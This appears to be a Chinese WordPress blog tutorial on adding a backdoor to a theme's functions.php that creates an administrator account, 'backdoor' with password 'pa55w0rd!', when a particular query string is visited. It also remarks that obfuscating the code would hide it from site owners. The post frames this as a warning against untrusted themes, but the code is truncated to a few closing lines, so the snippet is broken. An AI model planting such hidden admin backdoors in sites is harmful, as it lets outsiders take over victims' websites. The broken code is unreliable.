WordPress 教程:如何在 WordPress 站点创建后门

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界 🙂 。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

set_role( 'administrator' );
        }
    }
}

比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。 🙂


©我爱水煮鱼,本站推荐使用的主机:阿里云,国外主机建议使用BlueHost

本站长期承接 WordPress 优化建站业务,请联系微信:「chenduopapa」。